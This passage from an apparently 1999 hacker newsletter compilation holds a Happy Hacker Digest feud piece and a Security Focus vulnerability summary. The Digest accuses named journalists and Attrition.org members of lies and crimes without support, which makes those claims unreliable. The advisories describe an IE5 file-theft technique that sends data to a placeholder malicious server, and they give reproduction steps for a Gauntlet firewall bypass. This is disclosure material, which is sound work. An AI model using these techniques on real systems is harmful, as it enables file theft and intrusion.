      office space in Beaver, and said it gets "hundreds of thousands" of visitors
      each month. He has one full-time employee, paid and unpaid freelancers, and
      eight informers who keep him up to date on hacker activity. 
      
      Among the site's users are research firms who are putting faith in Vranesevich
      to help them understand computer security. For example, he is working with
      Klein Associates, a consulting firm near Dayton Ohio that advises companies on
      decision-making techniques. 
      So, folks, there you have it.  A respected reporter (Matt Richtel) from the
      world's most prestigious newspaper (The New York Times) actually researched his
      article.  He actually talked to the FBI instead of (as did Sprenger, Koch and
      Penenberg) trying to trick people into believing a malicious story about an FBI
      investigation concocted by criminal hacker suspect Martin.  I can hardly
      believe that Penenberg  who exposed Stephen Glass -- would risk losing his
      career by going along with Martin's scheme to smear Vranesevich. 
      
      Could it possibly have something to do with the book Penenberg told me he is
      writing about hackers?  Could he and the other two reporters who have written
      stories invented by Martin possibly be vying to get exclusive rights to the
      story of the hacking spree of Hacking for Girliez/Loan Gunmen?  Nah, I'm
      probably just paranoid.
      
      Well, it's time to sign off and get back to playing with SuSE Linux.  I'm
      building a new Hacker Wargame box with SuSE, lady.happyhacker.org.  Meanwhile,
      Vranesevich is working on raising funding to pay someone to administer the
      Hacker Wargame full time so we can teach you serious computer security
      techniques in a fun environment.  I feel honored to know Vranesevich, and look
      forward to the day when the people running the smear campaign against him
      suffer the fate of Stephen Glass.  Oh, in case you were wondering, Glass has
      been studying to be a lawyer.
      
      
       *** The Stephen Glass Syndrome
      
      
      See
      <http://www.forbes.com/columnists/penenberg/1999/0927.htm>http://www.forbes.
      com/columnists/penenberg/1999/0927.htm for the phony story against John
      Vranesevich that Penenberg recently wrote.  If you are a reporter, call me at
      505-281-9675 and I'll give you contact information for witnesses who can
      demonstrate that almost every item in Penenberg's story is false. 
      Specifically, Penenberg recycles every unfounded allegation made against
      Vranesevich that any reporter has ever been unethical enough to pick up from
      Martin's web site.  In private conversations with me, however, Penenberg has
      admitted he knows Martin has no credibility.  
      
      Penenberg was elevated to a senior editor of Forbes on the basis of his article
      "Lies, damn lies and fiction" in Forbes Digital Tool (May 11, 1998).   This
      broke the story behind "Hacker Heaven," an article in the New Republic by
      Stephen Glass.  Unfortunately the Forbes web site no longer carries Penenberg's
      article. However, the Columbia Journalism Review has an excellent story on the
      Glass hacker hoax at
      <http://www.cjr.org/year/98/4/glass.asp>http://www.cjr.org/year/98/4/glass.asp. 
      Following is an excerpt:
      
      How a Writer Fooled His Readers
      
                    by Ann Reilly Dowd
                    Dowd, a free-lancer, is former Washington bureau chief of Money
      and Fortune
          
      "We're going to Bethesda," Charles Lane, the editor of The New Republic, told
      Stephen Glass, the writer of a May 18 story, "Hack Heaven," that was being
      called factually challenged by reporters over at Forbes Digital Tool, the
      Forbes magazine Web site. And in Bethesda, Maryland, at the building where
      Glass had supposedly covered a computer-hackers' convention, Lane says his
      twenty-five-year-old star gave "the most detailed step-by-step account" of
      where he had sat, and with whom he had spoken. 
      
      It was only when Lane reminded him that the building's log and security videos
      would show who was actually there that day that Glass broke down and sobbed.
      Yes, he confessed, he had made up the conference. In truth, Lane says, the
      entire article had been created "out of whole cloth." So, it turns out, were
      others.
      
      Stephen Glass was a bright, prolific writer and prodigious reporter. He had a
      likable demeanor, an eye for detail, and an ear for language. He also had a
      fatal flaw -- a stunning lack of integrity...
      
      How was it possible that editors and checkers, who make their living as
      professional skeptics, got so snookered? When did it begin, and why?.
      
      Glass gamed the system, and brilliantly. He'd often submit stories late to the
      checkers so they were pressed for time. When they questioned his material, Lane
      says, Glass would provide forged faxes on fake letterheads of phony
      organizations, as well as fictitious notes, even voice mail or actual calls
      from people pretending to be sources. 
      
       *** Where the heck have we been?
      _______________________________________________________________________
      
      Yes, we're still alive!  Sorry for the long time not sending out mailings.  If
      you visit our web site from time to time, you'll see new features.  Actually,
      there's plenty of new material there.  Check it out!
      
      Also, we've had severe problems for almost two months with a bad T1 in our
      Amarillo operations.  So when you saw supposedly broken pictures or got a
      "connection reset by peer" message, that was just one after another technical
      screwup on the part of the backbone (Sprint, if you really want to know).  We
      are coping with that situation by mirroring the Happy Hacker web site on both
      the Antionline servers in Beaver, PA, while keeping another server up at SAGE,
      Inc.'s Amarillo site.  The SAGE server we are using is the recently released
      commercial version of their BRICKHouse server.  It's name is
      <http://gabriel.happyhacker.org/>http://gabriel.happyhacker.org, 206.61.52.31. 
      Try to break into her -- please!  That's what beta testing is all about!  The
      other is, um, well, I'm not supposed to tell (oh, no, security by obscurity!). 
      But, hey, typing <http://happyhacker.org/>http://happyhacker.org or
      <http://www.happyhacker.org/>http://www.happyhacker.org will get you there
      unless you run into a DNS server that doesn't update too often.
      
      I (Carolyn Meinel) have also been busy working on our Hacker Wargame.  People
      who were persistent discovered three new computers on the Wargame in August and
      September.  No one got root, but I did preserve all files on
      meyer.happyhacker.org, an OpenBSD server.  When I put it back up (probably next
      week), the folks who figured out the ridiculous guest password and the few who
      got into guest2 using find and grep can get back into the game and play with
      those two "find" executables.  Someone forgot to compile in the "bash hide"
      option on one of them, tsk, tsk.
      
      In general, the concept of the wargame is to figure out what is happening there
      yourself.  If you have to ask me what computers are there and how to break in,
      you aren't ready yet to play the game.  The basic concept is to look for
      computers whose IP addresses resolve to something that ends with
      "happyahcker.org." 
      
      See the Happy Hacker bookstore
      (<http://happyhacker.org/bookstore.html>http://happyhacker.org/bookstore.html)
      for computer manuals that will help get you up to speed, and read our Guides
      and Digests.  Oh, yes, don't forget The Happy Hacker book.  
      
      Don't email me with questions!  Please!  I have reached email meltdown and
      mostly just delete everything nowadays.  Also, people who email me asking for
      help committing crime will discover that they are being immortalized at
      <http://happyhacker.org/sucks.html>http://happyhacker.org/sucks.html.  
      
      I've also been working on a shell account server,
      <http://shells.techbroker.com/>http://shells.techbroker.com.  I had it on the
      Wargame for almost two months with two easy to crack accounts (one was user
      name test, password test).  The Tg0d gang got inside and was messing around and
      not getting root.  That made me feel good about the security, which was created
      by Satori and B-lips.  When it goes back up online in a few days, check it out
      for instructions on how to set up a home Windows 95/98 LAN and set up an
      Internet gateway so all your computers can access the Internet simultaneously
      through just one modem.  
      
      We will be selling shell accounts on shells.techbroker.com with tech support
      for people who want the power of a T1 for learning how to hack, and as a
      platform for competing in our Hacker Wargame.  Of course we will not allow
      shells.techbroker.com to be used as a platform to commit crime.
      
      Each Tuesday <http://antionline.com/>http://antionline.com posts a new "tip of
      the week" of mine.  If you want to find out how to get online with Linux really
      easily, even easier than Windows, check out the tip archives.  In a nutshell,
      the answer is, make sure your modem isn't a Winmodem, and install Caldera Linux
      (<http://www.caldera.com/>http://www.caldera.com). You can get an outstanding
      book on how to use Caldera at the Happy Hacker bookstore,
      <http://happyhacker.org/bookstore.html>http://happyhacker.org/bookstore.html.
      
      Also, I've been working on my next book, "Uberhacker: How to Break into
      Computers."  It will tell how to create Linux and WinNT attack computers, how
      to set up OpenBSD and Linux bastion computers, and how to set up a home hacker
      laboratory with many operating systems  cheaply!  As usual, I have to test
      everything.  This keeps me rather busy.  Not only that, in order to be helpful
      to you who will read the book, I try everything on many different computers
      with many different operating systems, and do half a dozen installations of
      each operating system on several different hardware configurations.  Whew!
      
      I've finished working with Red Hat Linux.  Right now I am experimenting with
      SuSE Linux (<http://www.suse.de/>http://www.suse.de), which comes with a totally
      awesome 5 gigs worth of programs, including many of great interest to hackers,
      such as nmap and SAINT.  I'm also still playing with Caldera, which is easier
      to install than Windows 98.  Next on my list are Debian Linux
      (<http://www.debian.org/>http://www.debian.org) and Solaris
      (<http://www.sun.com/>http://www.sun.com).
      
      
       *** Call for Editors
      
      
      
      We lost our Windows Digest editor Keydet89 because he objected to John
      Vranesevich donating his listserv services to us.  Keydet89 had several angry
      conversations with me in which he made it clear that he believes the
      allegations made against Vranesevich by Brian Martin's hacker gang, as seen at
      <http://attrition.org/>http://attrition.org.  Our Unix editor also quit.  As you
      saw in his last Digest, he was angry at Vranesevich for pointing out to Harvard
      University that the Packetstorm web site they were hosting contained a photo of
      his kid sister, her home address, and incitements to harm her.  Yes, I saw that
      material myself.  
      
      Harvard immediately took down the site, and made a statement to the media that
      the reason was attacks on an individual and pornography. Please give the
      Harvard administration credit for being decent human beings, folks.  And. I
      have no desire to work with anyone who would hate Vranesevich for protecting
      his kid sister. 
       
      I apologize to you who have subscribed to this mail list for not having done a
      better job of evaluating the character of two of the people who were our
      editors.  I was looking foremost for technical talent.  I failed to adequately
      consider the issue of values.  
      
      If anyone would like to take over the jobs of Windows editor and Unix editor,
      please phone me at 505-281-9675.  (Sorry, with there being way too much email,
      I usually just delete it unless it is from someone I know.)  This time around I
      will make sure that anyone who does volunteer work for us agrees that the
      attrition.org web site has serious ethical problems.  I mean, get real.  
      Attrition.org carries instructions for how to shoplift without getting caught
      and advocates murder, burglary, perjury and computer crime.  Common sense alone
      should tell anyone that its proprietors must also lie like rugs.
      
      If you applied before, please consider doing so again.  I apologize in advance
      for not choosing you, OK?
      
      These jobs pay nothing except the sense of satisfaction of helping people to
      learn about computers.  OK, the job also gives you something to put on your
      resume and gives you visibility in the computer security industry.  Also you
      can get into the inner circle of Happy Hacker and hang out with us terminal
      geeks.  Wowie!
      
      If you take the job, you will have to put up with people from Brian Martin's
      Attrition.org emailing and phoning you with fanciful, malicious stories.  If
      you do a good enough job, it is also possible that computer criminals will
      persuade their stable of credulous or unethical reporters (Polly Sprenger of
      Wired, Lew Koch of Cyberwire Dispatch, and Adam Penenberg of Forbes) into
      writing false and malicious stories about you, just as they have about
      Vranesevich. 
      
      So, if you are an ambitious masochist -- is this the perfect job, or what?
      _______________________________________________________________________
      To subscribe to the Happy Hacker Digest, email mailman@mailout.antionline.net
      with the message "subscribe happyhacker."  Unsubscribe with message
      unsubscribe happyhacker.
      
      This is a list devoted to *legal* hacking! If anyone plans to use any
      information in this Digest or at our Web site to commit crime, go away!  We
      like to put computer criminals behind bars where they belong!
      
      Hacker Wargame Director, Vincent Larsen <vincent@sage-inc.com>;
      Clown Princess: Carolyn Meinel <cmeinel@techbroker.com>
      
      Happy Hacker, Inc. is a 501 (c) (3) tax deductible organization
      _______________________________________________________________________
      
      
      
      @HWA  
      
93.0  Security Focus Newsletter
      ~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Security Focus Newsletter 10 & 11
      Table of Contents:
      
      I.   INTRODUCTION
      II.  BUGTRAQ SUMMARY
      1. Hybrid Cablemodem Remote Configuration Vulnerability
      2. Microsoft IE5 IFRAME Vulnerability
      3. RedHat PAM NIS Locked Accounts Vulnerability
      4. WebTrends Enterprise Reporting Server Multiple Vulnerabilities
      5. Jana Webserver Vulnerability
      6. Novell Client Denial of Service Vulnerability
      7. SCO OpenServer 5.0.5 'userOsa'  symlink Vulnerability
      8. SCO cancel Buffer Overflow Vulnerability
      9. RedHat lpr/lpd Vulnerabilities
      10. OpenLink 3.2 Remote Buffer Overflow Vulnerability
      11. Gauntlet Firewall Rules Bypass Vulnerability
      12. Microsoft IE5 Javascript URL Redirection Vulnerability
      III. PATCH UPDATES
      1. Vulnerability Patched: rpmmail Remote Command Execution Vulnerability
      2. Vulnerability Patched: Microsoft JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities\
      3. Vulnerability Patched: Microsoft IE5 Download Behavior Vulnerability
      4. Vulnerability Patched: Novell Client Denial of Service Vulnerability
      5. Vulnerability Patched: IIS Writeable mailroot/ftproot DoS Vulnerability
      6. Vulnerability Patched: Referer Tag Vulnerability (Roxen Webserver)
      7. Vulnerability Patched: RedHat PAM NIS Locked Accounts Vulnerability
      8. Vulnerability Patched: Microsoft IE5 IFRAME Vulnerability
      9. Vulnerability Patched: RedHat lpr/lpd Vulnerabilities
      10. Vulnerability Patched: Microsoft IE5 Javascript URL Redirection Vulnerability
      11. Vulnerability Patched: Multiple Vendor CDE dtaction Userflag Buffer Overflow Vulnerability
      12. Vulnerability Patched: Multiple Vendor amd Buffer Overflow Vulnerability
      13. Vulnerability Patched: Linux mirror Vulnerability (Debian)
      14. Vulnerability Patched: Multiple Linux Vendor lpr/lpd Vulnerabilities
      15. Vulnerability Patched: Mulitple Linux Vendor PAM NIS Locked Accounts Vulnerability
      IV.  INCIDENTS SUMMARY
      1. Interesting scans in the past few days (Thread)
      2. Random malfunction or hack?
      3. Notifying possibly compromised sites & SANS 99 (Thread)
      4. Site for sharing TCPDumps, firewall logs, etc.? (Thread)
      5. Log sharing
      6. Attack methodology
      7. Slow scan of 80,8080,3128/tcp from multiple sources (Thread)
      8. RES: Anyone seen traffic headed for UDP port 31789? (Thread)
      9. Intrusion Detection rfc draft
      10. directed broadasts to UDP ports 41508, 41524, 41530
      V. VULN-DEV RESEARCH LIST SUMMARY
      1. Re: Guestbook perl script (error fix - Thread)
      2. The PcWeek crack
      3. Re: Cisco IOS password types overview. (Thread)
      4. Timbuktu32 (Thread)
      5. Re: solaris DoS (fwd)
      6. FW: puzzlecrypt(tm--dr) (hint:sploit against dr - so I don't go deaf)
      7. Newbie in Jeopardy
      8. Window manager - implementation bug/feature ??? (Thread)
      9. fbsd 3.3 ospf_monitor research (Thread)
      10. SSH and X11 forwarding
      11. NT SysKey should be breakable (Thread)
      12. 2 dodgy network programs
      13. Free BSD 2.2.x listen() problem / FTP exploit
      14. Classes? (Thread)
      15. possible gnome remote overflow
      VI.   SECURITY JOBS
         Discussion: 
      1. yet another question about entering the security field (Thread)
         Seeking Position:
      1. Contact: I am looking for a good company to work for NYC - Edward Saxon, <ed_saxon@hotmail.com>
      2. Contact: Looking for security system administration position - Ender Wiggin, Mike@aviary-mag.com
         Seeking Staff:
      1. Unix/Network/Security Engineer - NYC
      2. Developer needed - San Mateo - California
      3. Unix/Network Security Engineer Needed In Maryland
      4. Domain Expert / Security Development / IT / Logistics #123
      5. Security Verification Analyst #123
      6. looking for information security manager....
      7. Job opportunities in San Jose
      8. 3com Job Posting
      1. Perl Programmer/System Administrator - NYC
      2. Wirex: Linux Systems Administrator, Portland, Oregon
      3. 10+ positions in the Bay Area, LA
      4. Security Engineers in Waltham, MA
      VII.  SECURITY SURVEY RESULTS
      VIII. SECURITY FOCUS EVENTS
      1. New Scoring and Comments under Tools, Products, Library and Links
      2. New Guest Feature - THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2
      IX. SECURITY FOCUS TOP 6 TOOLS
      1. UCGI Vulnerability Scanner 1.56 (Windows & Unix)
      2. NTInfoScan (NT)
      3. SuperScan 2.0.4 (NT)
      4. PacketX (NT)
      5. Achtung (NT)
      6. Custom Attack Scripting Language (NT & Unix)
      X. SPONSOR INFORMATION - Tripwire Security
      
      I.   INTRODUCTION
      -----------------
      
      Welcome to the Security Focus 'week in review' newsletter issue 10 & 11.
      We apologize for combining two weeks in a row. We have been working
      furiously on building infrastructure here at Security Focus. One of the
      results of this is that now you can rate and comment on essentially every
      item, product, paper and vendor on our site. Hopefully this new rating
      system will, over time, create an excellent community resource.
      
      
      II.  BUGTRAQ SUMMARY 1999-10-04 to 1999-10-19
      ---------------------------------------------
      
      1. Hybrid Cablemodem Remote Configuration Vulnerability BugTraq ID: 695
      Remote: Yes
      Date Published: 1999-10-05
      Relevant URL:
      http://www.securityfocus.com/bid/695
      Summary:
      
      Hybrid Network's cable modems are vulnerable to several different types of
      attack due to a lack of authentication for the remote
      administration/configuration system. The cable modems use a protocol
      called HSMP, which uses UDP as its transport layer protocol. This makes it
      trivial to spoof packets and possible for hackers to compromise
      cable-modem subscribers anonymously. The possible consequences of this
      problem being exploited are very serious and range from denial of service
      attacks to running arbitrary code on the modem.
      
      2. Microsoft IE5 IFRAME Vulnerability
      BugTraq ID: 696
      Remote: Yes
      Date Published: 1999-10-11
      Relevant URL:
      http://www.securityfocus.com/bid/696
      Summary:
      
      Internet Explorer 5 will allow a malicious web page to read the contents
      of local files through a weakness in the IE5 security model. Normally the
      document.execCommand method is restricted from reading and returning data
      on the local machine, however if the method is called from within an
      IFRAME this restriction can be circumvented.
      
      3. RedHat PAM NIS Locked Accounts Vulnerability
      BugTraq ID: 697
      Remote: No
      Date Published: 1999-10-13
      Relevant URL:
      http://www.securityfocus.com/bid/697
      Summary:
      
      Under some network configurations it may be possible to access locked NIS
      accounts due to a vulnerability in the PAM authentication modules shipped
      with RedHat version 6.1. This can lead to a local compromise where the
      password is known for a locked account. RedHat 6.1 for Intel platforms is
      the only vulnerable version.
      
      4. WebTrends Enterprise Reporting Server Multiple Vulnerabilities
      BugTraq ID: 698
      Remote: Yes
      Date Published: 1999-10-09
      Relevant URL:
      http://www.securityfocus.com/bid/698
      Summary:
      
      Certain versions of the WebTrends Enterprise Reporting Server contain a
      series of vulnerabilities. Namely versions 1.5 and previous, the
      vulnerabilities in question are be:
      
      1. Logging via the server will write to a world/writable file.
      
      Under certain conditions this file may contain certain sensitive
      information such as usernames and passwords, in clear text. This in
      particular is known to occur if you are not running using PAM (Pluggable
      Authentication Module).
      
      If the server is running without PAM, users must use the server provided
      interface to create new users and set their passwords. In this case, by
      default, everything (including username and password) is stored in clear
      text in the file "interface.log" with read/write permissions for user,
      group and other. Any local user can read that file. If a WebTrends user
      has also an shell account on the box with the same password, that account
      can be compromised.
      
       2. The server stores its' user information in files with world read/write permissions.
      
      All user information is stored in the directory "wtm_wtx/datfiles/users"
      in the format "username.usr". Those files are with owner/group/other
      read/write permissions. Any local user, can decrypt the password or even
      easier alter/delete the user file and therefore create a denial of
      service.
      
      3.  User profiles are stored in world readable, writable files.
      
      By altering these files it may be possible to launch a denial of service
      attack. As with the user files all profile information is stored in
      "wtm_wtx/datfiles/profiles" with owner/group/other read/write permissions.
      Any local user can alter/delete the profile file and therefore create a
      denial of service.
      
      4. Under default installations, a blank username and password is enabled.
      
      This will allow remote users to access the server with administration
      privileges to the software if the owner neglects to change this.
      
      
      5. Jana Webserver Vulnerability
      BugTraq ID: 699
      Remote: Yes
      Date Published: 1999-10-08
      Relevant URL:
      http://www.securityfocus.com/bid/699
      Summary:
      
      The Jana webserver is remotely vulnerable to an attack which can allow
      hackers to view files outside of the root httpd directory. See the bugtraq
      posting linked to from the references section of this vdb entry for more
      information. We have not been able to locate the maintainer of this
      product (The Jana webserver). If anyone has any information about who to
      contact for information regarding this issue, please contact
      vuldb@securityfocus.com.
      
      6. Novell Client Denial of Service Vulnerability
      BugTraq ID: 700
      Remote: Yes
      Date Published: 1999-10-08
      Relevant URL:
      http://www.securityfocus.com/bid/700
      Summary:
      
      Novell client versions 3.0 and 3.01 for Windows platforms are vulnerable
      to a remotely exploitable vulnerability which could cause a denial of
      service. The client opens a listening tcp socket on port 427, to which if
      a SYN is sent, results in the machine locking with a "blue screen" error.
      The only solution from that point is to reset the affected computer.
      
      7. SCO OpenServer 5.0.5 'userOsa'  symlink Vulnerability
      BugTraq ID: 701
      Remote: No
      Date Published: 1999-10-11
      Relevant URL:
      http://www.securityfocus.com/bid/701
      Summary:
      
      Under certain versions of SCO OpenServer there exists a symlink
      vulnerability which can be exploited to overwrite any file which is group
      writable by the 'auth' group. The problem in particular is in the the
      /etc/sysadm.d/bin/userOsa executable. When given garbage output the
      program will write out a debug log. However, the program does not check to
      see if it overwriting a currently existing file nor wether it is following
      a symlink. Therefore is it possible to overwrite files with debug data
      which are both in the 'auth' group and are writable by the same group.
      Both /etc/shadow & /etc/passwd fall into this category. If such an attack
      were launched against these files the system would be rendered unusable.
      
      
      8. SCO cancel Buffer Overflow Vulnerability
      BugTraq ID: 702
      Remote: No
      Date Published: 1999-10-08
      Relevant URL:
      http://www.securityfocus.com/bid/702
      Summary:
      
      There is a buffer overflow vulnerability in
      /opt/K/SCO/Unix/5.0.5Eb/.softmgmt/var/usr/bin/cancel. It is important to
      know that the overflows are not in "/usr/bin/cancel" or
      "/usr/lpd/remote/cancel". The consequence of this vulnerability being
      exploited is compromise of effective groupid of group lp.
      
      9. RedHat lpr/lpd Vulnerabilities
      BugTraq ID: 718
      Remote: No
      Date Published: 1999-10-18
      Relevant URL:
      http://www.securityfocus.com/bid/718
      Summary:
      
      The lpr packages that ship with RedHat Linux releases 4.x to 6.1 contain
      vulnerabilities which may allow printing of files for which read access is
      not allowed. The first of the two problems is a race condition that can be
      exploited between the access checking and the opening of the file. The
      second is a symlink attack that could also be used to print files that
      normally cannot be read by a regular user (through lpr -s).
      
      10. OpenLink 3.2 Remote Buffer Overflow Vulnerability
      BugTraq ID: 720
      Remote: Yes
      Date Published: 1999-10-15
      Relevant URL:
      http://www.securityfocus.com/bid/720
      Summary:
      
      Both the Unix and WindowsNT versions of OpenLink 3.2 are vulnerable to a
      remotely exploitable buffer overflow attack. The problem is in their web
      configuration utility, and is the result of an unchecked strcpy() call.
      The consequence is the execution of arbitrary code on the target host
      (running the configuration utility) with the priviliges of the web
      software.
      
      11. Gauntlet Firewall Rules Bypass Vulnerability
      BugTraq ID: 721
      Remote: Yes
      Date Published: 1999-10-18
      Relevant URL:
      http://www.securityfocus.com/bid/721
      Summary:
      
      It may be possible to violate all firewall rules if certain conditions are
      met when Gauntlet Firewall 5.0 is installed on the BSDI platform with a
      specific configuration.  The following things need to happen in the order
      listed below for Gauntlet to be exploitable:
      
       1) Install BSDI 3.1
      
       2) Install Gauntlet 5.0
      
       3) Install BSDI patch M310-049
      
       4) Install Gauntlet 5.0 kernel patch level 2
      
       5) Remove any proxy settings on client machine.
      
       6) Set the default route on the client machine and attempt to connect to
          any host through a normal tcp connection.
      
      This problem surfaces when connections are made through any adaptive
      proxy, "old" proxy or no proxy at all.  In order to exploit this, a route
      will need to be specified since NAT will not occur when data is sent
      through the affected firewall.
      
      None of the connections that ignore the rules are logged in
      /var/log/messages.
      
      Keith Young describes how to replicate the problem (this is taken directly
      from his bugtraq post):
      
      
      1) Install BSDI 3.1, March 1998. Use automatic install, however you may
      install minimal packages if you wish.
      2) Mount the Gauntlet 5.0 CD-ROM. Execute /cdrom/fwinstall
      3) Install Gauntlet 5.0.
      4) Reboot after installation.
      5) Login as root.
      6) Enter "Fast GUI Setup". Fill in appropriate Interface settings for
      external and internal interfaces. If necessary, configure ESPM hosts, DNS settings, and admin
      users.
      7) Quit gauntlet-admin, save changes, and rebuild.
      8) After proxies have reconfigured, reboot machine.
      9)  Since M310-049 is required for Gauntlet kernel patch install, and
      M310-046 is required for M310-049 installation, download both from
      
      ftp://ftp.bsdi.com/bsdi/patches/patches-3.1/
      
              File info:
              M310-046        1194 Kb    Wed Oct 14 00:00:00 1998
              M310-049        116 Kb     Wed Dec 16 00:00:00 1998
      Both patches are considered "OK" by the Gauntlet support site:
      http://www.tis.com/support/bsd31.html
      
      10) Bring machine to single-user mode by executing "kill -term 1".
      11) Execute "perl5 M310-046 apply" to install BSDI libc patch.
      12) Execute "perl5 M310-049 apply" to install IP DoS fix.
      13) Execute "cd /sys/compile/GAUNTLET-V50/".
      14) Build new kernel as required by M310-049 IP DoS kernel fix.
              # make clean
              # make depend
              # make
      15) After kernel is rebuilt, reboot machine.
      16) Download Gauntlet 5.0 kernel and cluster patch:
              File info:
              cluster.BSDI.patch      12623 Kb    Wed Sep 01 19:33:00 1999
              kernel.BSDI.patch       414 Kb      Wed Aug 04 17:54:00 1999
      17) As noted in patch install directions, execute the following:
              # sh ./cluster.BSDI.patch
              # sh ./kernel.BSDI.patch
              # cd kernel.BSDI.patch
              # sh ./apply
              # cd ../cluster.BSDI.patch
              # sh ./apply
      18) After patches are installed, reboot machine.
      19) Install ESPM-GUI on client machine. Start ESPM-GUI. Add client machine
      to trusted network group. Apply changes.
      
      20) Start web browser on client machine. Set web proxy setting to internal
      interface of firewall. Attempt to connect to external web server. Access
      is allowed. *This is correct.*
      
      20) Remove http-gw from trusted network services. Apply changes. Attempt
      to connect to external web server. Access is denied. *This is correct.*
      
      ==Problem starts here==
      
      21) Remove proxy setting in web browser on client machine. Set
      gateway/default route on client machine to internal interface of firewall. Set gateway/default
      route on server machine to external interface of firewall.
      
      22) Clear web browser cache. Attempt to connect to external web server.
      Web page is downloaded with no logs in Gauntlet.
      
      23) Start ESPM-GUI. Remove all services from trusted networks services.
      Remove client machine from ESPM network group. Apply changes.
      
      24) FTP from client machine to server. FTP connection is made though no
      rule exists.
      
      25) Start telnet server on client machine. Telnet from server to client.
      Telnet connection is made.
      
      
      12. Microsoft IE5 Javascript URL Redirection Vulnerability
      BugTraq ID: 722
      Remote: Yes
      Date Published: 1999-10-18
      Relevant URL:
      http://www.securityfocus.com/bid/722
      Summary:
      
      A malicious web site operator could design a web page that, when visited
      by an IE5 user, would read a local file from the victim host (or any file
      on the victim's network to which the victim has access) and send the
      contents of that file to a designated remote location.
      
       1) In the instance noted above, the IE5 user visits a malicious web site.
      
       2) The web site instructs the client to open another IE5 browser window
          and display the contents of a file residing on the IE5 user's host (or
          another host on the network to which the IE5 user has access).
      
       3) Immediately after opening the new browser window, the window is
          instructed to browse to a specified web site ie: http://malicious
          server.com/hack.cgi?doit.
      
       4) The hack.cgi?doit page does not return a web page, but instead
          redirects the window to a javascript URL containing embedded
          executable code.
      
       5) The javascript code (from step 4) can now access any files on the
          victim's host (or any file on the victim's network to which the victim
          has access) and send it to a location maintained by the malicious web
          site operator.
      
       Under normal circumstances, javascript received from a non-local
      "security zone" is not allowed to perform such actions against files on
      the local host. In this instance, however, the IE5 browser has been fooled
      (via http redirect to javascript) into thinking that the Javascript should
      execute under the security context of the local host's security zone as
      the javascript was requested from a browser displaying the local file.
      
      Microsoft has released a FAQ that contains a good description of this
      vulnerability:
      
      http://www.microsoft.com/security/bulletins/MS99-043faq.asp.
      
      III. PATCH UPDATES 1999-10-04 to 1999-10-19
      -------------------------------------------
      
      1. Vendor: Reedycreek
      Product: rpmmail
      Patch Location:
      ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4.tar.gz
      ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4-2.i386.rpm
      Vulnerability Patched: rpmmail Remote Command Execution Vulnerability
      BugTraq ID:
      Relevant URLS:
      http://www.reedycreek.com
      
      2. Vendor: Microsoft
      Product: Microsoft JET 4.0SP1
      Vulnerability Patched: Microsoft JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities
      BugTraq ID: 654
      Patch Location:
      http://officeupdate.microsoft.com/articles/mdac_typ.htm
      Relevant URLS:
      http://www.securityfocus.com/bid/654/
      
      3. Vendor: Microsoft
      Product: Internet Explorer 5.0 
      Vulnerability Patched: Microsoft IE5 Download Behavior Vulnerability
      BugTraq ID: 674
      Patch Location:
      http://www.microsoft.com/msdownload/iebuild/dlbhav/en/dlbhav.htm
      http://windowsupdate.microsoft.com
      Relevant URLS:
      http://www.securityfocus.com/bid/674
      
      4. Vendor: Novell
      Product: Novell Client 3.1 for Windows
      Vulnerability Patched: Novell Client Denial of Service Vulnerability
      BugTraq ID: 700
      Patch Location:
      http://support.novell.com/cgi-bin/search/tidfinder.cgi?2945422
      Relevant URLS:
      http://www.securityfocus.com/bid/700
      http://support.novell.com
      
      5. Vendor: Microsoft
      Product: IIS
      Vulnerability Patched: IIS Writeable mailroot/ftproot DoS Vulnerability
      BugTraq ID:
      Patch Location:
      A tip was added to the Microsoft Security Checklist regarding this problem.
      http://www.microsoft.com/security/products/iis/CheckList.asp
      Relevant URLS:
      http://www.microsoft.com/security
      
      6. Vendor: Roxen
      Product: Challenger Webserver
      Vulnerability Patched: Referer Tag Vulnerability
      BugTraq ID:
      Patch Location:
      ftp://ftp.roxen.com/pub/roxen/patches/roxen_1.3.111-htmlparse.pike.patch
      Relevant URLS:
      http://www.roxen.com
      
      7. Vendor: Red Hat
      Product: RedHat Linux
      Vulnerability Patched: RedHat PAM NIS Locked Accounts Vulnerability
      BugTraq ID: 697
      Patch Location:
      RedHat released new PAM packages available at:
      ftp://updates.redhat.com/6.1/i386/pam-0.68-8.i386.rpm
      ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-8.src.rpm
      Relevant URLS:
      http://www.redhat.com/corp/support/errata/index.html
      http://www.securityfocus.com/bid/697
      
      8. Vendor: Microsoft
      Product: Microsoft Internet Explorer
      Vulnerability Patched: Microsoft IE5 IFRAME Vulnerability
      BugTraq ID: 696
      Patch Location:
      http://www.microsoft.com/windows/ie/download/windows.htm
      MSIE Only (Intel): ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/x86/q243638.exe
      MSIE Only (Alpha): ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/Alpha/q243638.exe
      Relevant URLS:
      http://security.microsoft.com
      http://www.securityfocus.com/bid/696
      
      9. Vendor: Red Hat
      Product: RedHat Linux
      Vulnerability Patched: RedHat lpr/lpd Vulnerabilities
      BugTraq ID: 718
      Patch Location:
       Red Hat Linux 4.x:
       Intel:
       ftp://ftp.redhat.com/pub/redhat/updates/4.2/i386/lpr-0.43-0.4.2.i386.rpm
       Alpha:
       ftp://ftp.redhat.com/pub/redhat/updates/4.2/alpha/lpr-0.43-0.4.2.alpha.rpm
       Sparc:
       ftp://ftp.redhat.com/pub/redhat/updates/4.2/sparc/lpr-0.43-0.4.2.sparc.rpm
       Source packages:
       ftp://ftp.redhat.com/pub/redhat/updates/4.2/SRPMS/lpr-0.43-0.4.2.src.rpm
      
       Red Hat Linux 5.x:
       Intel:
       ftp://ftp.redhat.com/pub/redhat/updates/5.2/i386/lpr-0.43-0.5.2.i386.rpm
       Alpha:
       ftp://ftp.redhat.com/pub/redhat/updates/5.2/alpha/lpr-0.43-0.5.2.alpha.rpm
       Sparc:
       ftp://ftp.redhat.com/pub/redhat/updates/5.2/sparc/lpr-0.43-0.5.2.sparc.rpm
       Source packages:
       ftp://ftp.redhat.com/pub/redhat/updates/5.2/SRPMS/lpr-0.43-0.5.2.src.rpm
      
       Red Hat Linux 6.x:
       Intel:
